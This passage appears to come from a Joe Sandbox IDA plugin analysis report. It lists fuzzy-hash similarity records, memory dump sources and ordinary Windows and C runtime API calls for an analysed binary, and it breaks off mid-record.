                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b3bd2e17d720d2d77cd0cf9e50955ebee3926fdde723c055a40e9693355ffc1e
                                                                        • Instruction ID: 6b84ad622da558b3cba5b50515f873e7239045d3587a9786111eecf19aac86f9
                                                                        • Opcode Fuzzy Hash: b3bd2e17d720d2d77cd0cf9e50955ebee3926fdde723c055a40e9693355ffc1e
                                                                        • Instruction Fuzzy Hash: A5916B7BB543004BDB14CC3988D53FB67D2DBD5310F2A9CB69894CB251E9BACC4A8B42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 100420c5b7dc0769dfa7cb463b72aed262ea9a31029ef0d9d11f8b090707fa12
                                                                        • Instruction ID: 5fbe37b6a29d052461d5e842a900554cbbd8cc1c0c965cf5cfbefc042c5a2af8
                                                                        • Opcode Fuzzy Hash: 100420c5b7dc0769dfa7cb463b72aed262ea9a31029ef0d9d11f8b090707fa12
                                                                        • Instruction Fuzzy Hash: B3A12736A082018FDB188D34D4E53EB77D29BE6350F29546ED88A87752D9338C4A8F91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3d8c0c568a7e2cfe77bb0babbc69c6cf107ad4b949d868415074b2913fadb5b9
                                                                        • Instruction ID: 936339532d7920fab2fafcadd8f3dc71e8fe2c8f369fc9a3415636021acbeced
                                                                        • Opcode Fuzzy Hash: 3d8c0c568a7e2cfe77bb0babbc69c6cf107ad4b949d868415074b2913fadb5b9
                                                                        • Instruction Fuzzy Hash: B1913C37765A000FEB08893E9CE53EB67C347E6314F2EE4799589C7656ED7F880A4A00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e65c0a2e462adb87e0d5dfff621f9ca5446e5ca97955d018583b64e6bd7d974f
                                                                        • Instruction ID: 456a09870263ad4d6d14fc2f72506e1e3243f8247806910d075f7afce4ddfaf9
                                                                        • Opcode Fuzzy Hash: e65c0a2e462adb87e0d5dfff621f9ca5446e5ca97955d018583b64e6bd7d974f
                                                                        • Instruction Fuzzy Hash: AB915A73B64A020BEB5CC97888E63FB23C397D9314F2AD53A951BC72A0DD6EC8454641
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4ec845ba95890f1113e49cc3232a4fcef1d8706162b31b29c8294cbf0be96f4
                                                                        • Instruction ID: bf3d5cc4b9dbc69d1593b2782e142c87e983bfc85e4202655c3379276badf605
                                                                        • Opcode Fuzzy Hash: b4ec845ba95890f1113e49cc3232a4fcef1d8706162b31b29c8294cbf0be96f4
                                                                        • Instruction Fuzzy Hash: E8913A3AB483115FEF1488B5C4D43EB67D387D6704F16E4BAC8888B366D8778C499B91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8a0dd99972acdbac187b33bd43d2d9372f2f524051997156c3125f48412d9db5
                                                                        • Instruction ID: b3b8b04041295377fb5c2ad102be2959c081c9a2de25417c802202e6d6d0798e
                                                                        • Opcode Fuzzy Hash: 8a0dd99972acdbac187b33bd43d2d9372f2f524051997156c3125f48412d9db5
                                                                        • Instruction Fuzzy Hash: 45A12436A0C2408FC728CE19C8D066EB7E3ABC9314F1549AEE849E7754DE35DD458B93
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9c79843dec16212f1c97001263395675b607b0a699f43ad451e83bd1ea187b3
                                                                        • Instruction ID: 06d90d24edd96bf9a0cc2342310e2f4003925a014b9822ca49a069d2024ae68b
                                                                        • Opcode Fuzzy Hash: e9c79843dec16212f1c97001263395675b607b0a699f43ad451e83bd1ea187b3
                                                                        • Instruction Fuzzy Hash: AE91AD7BF69B244B9318DEA9CCC116AB5C2DBD8314F1A857ED8A9DB311DDB8DC4082C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 352c5b9423bf297c106965edbf737ce701fd9589a9d94ed65ba5615f70c1aaf5
                                                                        • Instruction ID: 8421fe02a4b95b0ab5f0ce1304c8e792cc3b0937183e452b9afe51d0a2a4c6e6
                                                                        • Opcode Fuzzy Hash: 352c5b9423bf297c106965edbf737ce701fd9589a9d94ed65ba5615f70c1aaf5
                                                                        • Instruction Fuzzy Hash: 5981F432A146108FC724CF2888D56FEBBE1EBD5310F5948AEE895D7311DA71DD858B83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d80dd56b80fc333cd81ac1d2c625f41708e529bce72d21e7a75007168fa4eb74
                                                                        • Instruction ID: 52d630fb178e9fca5334be277305d1c9dad3207558e59f4432e773a54db08f0d
                                                                        • Opcode Fuzzy Hash: d80dd56b80fc333cd81ac1d2c625f41708e529bce72d21e7a75007168fa4eb74
                                                                        • Instruction Fuzzy Hash: 785105706082014FC7158E28D0E57FF7BE2EB99315F21586EE4899B350E6BACC48CF92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b00db118ae43f77ecf9935dff7ea928fa550529d6286dbed9c1aaad95f63f5b
                                                                        • Instruction ID: 8f1231e54060827a668fa7ad233902511b3a1d102984fa36ce8b0b0c3711a6b4
                                                                        • Opcode Fuzzy Hash: 2b00db118ae43f77ecf9935dff7ea928fa550529d6286dbed9c1aaad95f63f5b
                                                                        • Instruction Fuzzy Hash: 4251577570C2018BD708CA29C8D17AB77C2ABCA310F55486EE58ECB361DB36CC98D746
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3d4facc7f808c927171c3e50bfb721220d5c78bc9aed89a7a723322af0856b7b
                                                                        • Instruction ID: 4a2a4ebf7e8bfccd1043e3fb8dc7d0850387a71a35d3afe75bc5908453bc0c62
                                                                        • Opcode Fuzzy Hash: 3d4facc7f808c927171c3e50bfb721220d5c78bc9aed89a7a723322af0856b7b
                                                                        • Instruction Fuzzy Hash: 9841F33434C2014FCB199A38C5E47EF7BE2DBD6314F6554A9D4C98B262EA77CC888B42
                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00BF0160,00000FA0,?,?,00BBE75E), ref: 00BBE8AC
                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00BBE75E), ref: 00BBE8B7
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00BBE75E), ref: 00BBE8C8
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BBE8DA
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BBE8E8
                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00BBE75E), ref: 00BBE90B
                                                                        • DeleteCriticalSection.KERNEL32(00BF0160,00000007,?,?,00BBE75E), ref: 00BBE927
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00BBE75E), ref: 00BBE937
                                                                        Strings
                                                                        • WakeAllConditionVariable, xrefs: 00BBE8E0
                                                                        • kernel32.dll, xrefs: 00BBE8C3
                                                                        • SleepConditionVariableCS, xrefs: 00BBE8D4
                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BBE8B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                        • API String ID: 2565136772-3242537097
                                                                        • Opcode ID: b1b4159e4c783f0c15cf99c4d0cffbceb8720fa69088f5ec5001396d46228876
                                                                        • Instruction ID: 7767157c16aa90565e96af623fe9085876a91cc859d147678eae022bc7a8c1a6
                                                                        • Opcode Fuzzy Hash: b1b4159e4c783f0c15cf99c4d0cffbceb8720fa69088f5ec5001396d46228876
                                                                        • Instruction Fuzzy Hash: 5E01D831A503416FD7112B756C4EAB73ED8EB55B417400090F915E72B1DFB0ED01CA61
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00BB5BBB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LockitLockit::_std::_
                                                                        • String ID: R&kt$R&kt$R&kt$R&kt$bad locale name$j&V$j&V
                                                                        • API String ID: 3382485803-3629830979
                                                                        • Opcode ID: ce9f9909cd50497c5ac1d8af28b1d019764aa7f14280e9cc11291384b30b61e8
                                                                        • Instruction ID: 44313d02bd9c33b13ba7fbcdee81c7a605413f09175ed60c41065fc70eedf0f1
                                                                        • Opcode Fuzzy Hash: ce9f9909cd50497c5ac1d8af28b1d019764aa7f14280e9cc11291384b30b61e8
                                                                        • Instruction Fuzzy Hash: AB51D370A08B488BCB309F2894957BAB6D1EF95744F6448ACF84ADB341DBF5CD448B87
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 00BB6E27
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00BB6F2A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task_strlen
                                                                        • String ID: .jK$.jK$.jK$.jK$.jK$/jK$/jK
                                                                        • API String ID: 575380510-2724332816
                                                                        • Opcode ID: 9978611f184aa9077d375a2769183c346f4e2dbc4377be4e6fadf07d104c971f
                                                                        • Instruction ID: 3ed53bab889bd8825c4b1776c1487153b189c93bddc38a4694bc1a1cdea59f02
                                                                        • Opcode Fuzzy Hash: 9978611f184aa9077d375a2769183c346f4e2dbc4377be4e6fadf07d104c971f
                                                                        • Instruction Fuzzy Hash: 1F31AE794483089FCA10EF14D48267AB7E9EFA9354F5488A9E88887701E3B5EC40CB93
                                                                        APIs
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00BCDBC9
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00BCDCD7
                                                                        • CatchIt.LIBVCRUNTIME ref: 00BCDD28
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00BCDE29
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00BCDE44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 4119006552-393685449
                                                                        • Opcode ID: 95c816ba995e998f69269be538fc25885f9b79849cc1016efbe7c3a949c6d047
                                                                        • Instruction ID: 4b7daa49209e6fd29968d90c448bb4ec1763ec1e7b84cee379ac3234c8758dff
                                                                        • Opcode Fuzzy Hash: 95c816ba995e998f69269be538fc25885f9b79849cc1016efbe7c3a949c6d047
                                                                        • Instruction Fuzzy Hash: E4B14679800209AFCF19DFA4C881EAEBBF5EF54310B1545BEE8156B212D730EA51CBA1
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BA437A
                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BA43CE
                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BA43FB
                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BA4402
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                        • String ID: E+$F+$F+
                                                                        • API String ID: 2261580123-1602586302
                                                                        • Opcode ID: a8adc69b0c7d64c7cab5c01f76fe6622a7a8dc088375b32aa8374e5731e1dfde
                                                                        • Instruction ID: b2aa4a93d0e30dca9682f375417a6c91e31c2251ffed686d196d5fdc5e1dd64d
                                                                        • Opcode Fuzzy Hash: a8adc69b0c7d64c7cab5c01f76fe6622a7a8dc088375b32aa8374e5731e1dfde
                                                                        • Instruction Fuzzy Hash: 6921C834608301EBDE206658D8D276E73D4EBE6710F1409BEF55ACB761D7F2DC448A4A
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(012D05D0,012D05D0,00000000,7FFFFFFF,?,00BDEEE5,012D05D0,012D05D0,00000000,012D05D0,?,?,?,?,012D05D0,00000000), ref: 00BDEFA0
                                                                        • __alloca_probe_16.LIBCMT ref: 00BDF05B
                                                                        • __alloca_probe_16.LIBCMT ref: 00BDF0EA
                                                                        • __freea.LIBCMT ref: 00BDF135
                                                                        • __freea.LIBCMT ref: 00BDF13B
                                                                        • __freea.LIBCMT ref: 00BDF171
                                                                        • __freea.LIBCMT ref: 00BDF177
                                                                        • __freea.LIBCMT ref: 00BDF187
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                        • String ID:
                                                                        • API String ID: 127012223-0
                                                                        • Opcode ID: 8be0ef747ae67bd5bee685223a2bbb8433ab45fbfebd03fe93372ebdcdedb8ff
                                                                        • Instruction ID: 62d712a869590bb4e9005b221ba5ae7a49767358df225b51cccd0be0300247a0
                                                                        • Opcode Fuzzy Hash: 8be0ef747ae67bd5bee685223a2bbb8433ab45fbfebd03fe93372ebdcdedb8ff
                                                                        • Instruction Fuzzy Hash: 81718272904246AADB219F94CC81FBEB7E6DF49710F1800EBE915BB341F635DD418760
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00BC1414
                                                                        • __alloca_probe_16.LIBCMT ref: 00BC1440
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00BC147F
                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BC149C
                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00BC14DB
                                                                        • __alloca_probe_16.LIBCMT ref: 00BC14F8
                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BC153A
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BC155D
                                                                        Memory Dump Source
